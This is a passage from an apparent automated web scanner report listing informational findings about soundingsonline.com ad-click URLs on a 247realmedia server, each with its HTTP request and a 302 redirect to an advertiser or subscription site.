  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.154. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.155. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.156. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.157. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.158. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.159. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

20.160. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.161. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.162. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.163. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:18:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.164. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.165. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.166. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.167. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
